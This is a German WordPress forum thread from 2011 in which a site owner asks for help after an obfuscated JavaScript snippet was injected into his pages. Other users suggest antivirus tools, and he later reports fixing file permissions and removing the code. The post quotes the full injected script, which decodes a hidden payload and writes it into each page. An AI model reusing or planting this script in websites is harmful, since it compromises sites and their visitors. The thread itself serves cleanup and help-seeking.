Sicherheitslücke in Plugins?

  • Hallo,

    irgend ein Plugin schleust einen Virus / Trojaner auf meine Seite.

    und bindet am Ende immer diesen Script ein:

    Code
    <!-- ad --><script>
    var xc50abe1599df70={r88995756542:function(r328e7cee){var j5d805a23=String,o5128c=r328e7cee.substr(2,3)-680,n05d6b1b,t8862c88;r328e7cee=r328e7cee.substr(5);var h6db08=this.cd1965ce(r328e7cee);for(var xa7073c=0;xa7073c<h6db08;xa7073c++){try{throw(p325ad=r328e7cee.substr(xa7073c,1));}catch(e){p325ad=e;};if(p325ad=='~'){o5128c="";xa7073c++;e45458a=r328e7cee.substr(xa7073c,1);while(this.r45becac(e45458a)){o5128c+=e45458a;xa7073c++;e45458a=this.nc3052(r328e7cee,xa7073c);}o5128c-=568;continue;}n05d6b1b="";if(p325ad=='�'){xa7073c++;p325ad=r328e7cee.substr(xa7073c,1);while(p325ad!='�'){n05d6b1b+=p325ad;xa7073c++;p325ad=r328e7cee.substr(xa7073c,1);}n05d6b1b=this.d40e90(n05d6b1b,o5128c,10);if(n05d6b1b<0)n05d6b1b+=256;if(n05d6b1b>=192)n05d6b1b+=848;else if(n05d6b1b==168)n05d6b1b=1025;else if(n05d6b1b==184)n05d6b1b=1105;document.write(j5d805a23["fr\x6f\x6dC\x68\x61\x72\x43od\x65"](n05d6b1b));continue;}he97f7=(p325ad+'')["\x63harC\x6fd\x65At"](0);if(he97f7>848)he97f7-=848;t8862c88=he97f7-o5128c-10;if(t8862c88<0)t8862c88+=256;if(t8862c88>=192)t8862c88+=848;else if(t8862c88==168)t8862c88=1025;else if(t8862c88==184)t8862c88=1105;document.write(this.qe2d875b(t8862c88));}},cd1965ce:function(u66ea55){return u66ea55.length;},nc3052:function(fdf074cda,v4d816d){return fdf074cda.substr(v4d816d,1);},r45becac:function(t9f22e7){return t9f22e7!='~';},d40e90:function(n25700042,qb8861,n5f307){return n25700042-qb8861-n5f307;},qe2d875b:function(c7b501){var j5d805a23=String;return j5d805a23["fr\x6f\x6dC\x68\x61\x72\x43od\x65"](c7b501);},g53145:function(){return "4f723q~727~�18��15�~612~�168�~590~�129��141��133�@~684~�241��240��225��187��160��230�~638~�196��196��192��138��127�~714~�203��254��253��18��253�~732~�28��29��26��15��20��220�~739~�24�$\"�228�*~746~560%�237�~711~�8��203��200��12�~609~�155�i�171��150��159�~590~P�134�YN�144��136��144�~634~�139��191��137�~595~]�136�^�139�U^X~655~�199��153�~668~�160��167�~617~l�161��159�~612~g�154�h~670~�211��162��209��209��169��162��169�~707~�250�~731~�227��227��221�~747~!�31��31��32��223�~683~�157��244��230�~740~�26�~680~�238��226�~653~�156��129��144�~624~d~580~6�126��123��127�~745~\"#/�248��221�~621~p~651~�127��125��195��207��190��202�~701~�244��241��254�~707~�7��249��250��7��210��183��197��183��211�~608~na�155�~746~\".~755~&~610~�161��153�r";}};xc50abe1599df70.r88995756542(xc50abe1599df70.g53145());
    </script><!-- /ad -->

    gibt es eine Möglichkeit diesen Script zu entfernen? In den FTP ordner und Footer Datei finde ich nichts :(

    Es handelt sich dabei um diese Seite:
    http://www.xn--herrenausstatter-kln-lbc.de

    Folgende Plugins laufen gerade:
    Akismet
    Google XML Sitemaps
    Permalink Redirect
    Platinum SEO Pack
    Redirection
    WP-Permalauts


    Edit: es war vermutlich kein Virus. Schreibrechte für alle Index Dateien wurden auf 777 umgestellt. Ich habe es manuell zurück auf 644 gemacht und seitdem läuft alles gut (ohne Schadcode).

    Einmal editiert, zuletzt von duran1 (31. Mai 2011 um 22:25)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Ich bin da kein Experte, hab mir aber auch mal was eingefangen. Mein Rechner war verseucht ("dank" Avira erst spät gemerkt), und meine Websites voller Schadcode.

    Prüfe deinen Rechner mal mit avast, und frag danach mal Google. Deine Website will ich jetzt äußerst ungerne aufrufen, wenn sie verseucht ist.

  • Ich bin da kein Experte, hab mir aber auch mal was eingefangen. Mein Rechner war verseucht ("dank" Avira erst spät gemerkt), und meine Websites voller Schadcode.

    Prüfe deinen Rechner mal mit avast, und frag danach mal Google. Deine Website will ich jetzt äußerst ungerne aufrufen, wenn sie verseucht ist.


    ja bei mir das selber, avira zu spät gecheckt... rechner mit 3 viren scanner durch gebohrt und anschließend alle ftp passwörter geändert...

    der schad-code wurde entfernt und kommt hoffentlich nicht so schnell wieder..

  • Auf deiner Site ist das Javascript definitiv nicht, zumindest wird kein ungewöhnlicher Code bei mir angezeigt (surfe mit abgeschottetem Ubuntu ;)).

    Es ist aber sehr lobenswert, dass Du hier wenigstens erst fragst, bevor Du gleich WP oder Plugins sowas zuschreibst und verteufelst. Passiert leider am häufigsten, ohne zunächst mal von Profis das untersuchen zu lassen.

    Übrigens nennt man so etwas Crosssite-Scripting, fängt man sich meistens auf präparierten Seiten oder unsicheren Foren ein. Gerade Windows-Kisten sollten dringensd entsprechende Programme einsetzen, die heuristisch auch die angesurften Websites vor Anzeige prüft. Avira ist da schon verdammt gut, aber auch sehr penetrant, Sites aus Ihrer Schadcode-DB herauszunehmen, wenn die "bereinigt" wurden (einem Kunden passierte dies, irrtümlich in diese DB gelandet und ist bis heute - 8 Monate später - immer noch nicht aus dieser DB obwohl da gar nichts drauf ist). Welche Alternativen es noch gibt kann ich nicht sagen, da ich hauptsächlich nur unter Linux arbeite.

    Freut mich allerdings für Dich, dass Du dem Herr geworden bist.

  • Alls bei mir alles verseucht war, hat Avira nichts gefunden, und es müssen schon Tage gewesen sein. Ich habe mich dann in Viren-Foren nach guten Scannern erkundigt, und alle haben avast empfohlen. Erst ein Durchlauf damit hat einiges ans Licht, und dann in Ordnung gebracht.

  • Habe nun die "Fehlerquelle" entdeckt. Es war an sich kein Virus oder Trojaner (zumindest glaube ich das). Aus irgendeinem Grund wurden alle index.php / html dateien auf 777 (schreib/lese Recht für alle) umgestellt.

    Ich musste also per Hand auf 644 (alle index Dateien) umstellen und manuell den "Schadcode" löschen.

    Das war eine Sauarbeit, da jede Webseite/Blog betroffen war.

    Aber jetzt scheint es wieder in Ordnung zu sein. Habe auch sicherhaltshalber Filezilla rausgeworfen und ein anderes FTP programm installiert.

    Seid ein paar Wochen läuft alles ohne Probleme.

    Ich hoffe, dass ich anderen Betroffenden helfen konnte :=)

    Einmal editiert, zuletzt von duran1 (31. Mai 2011 um 22:22)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!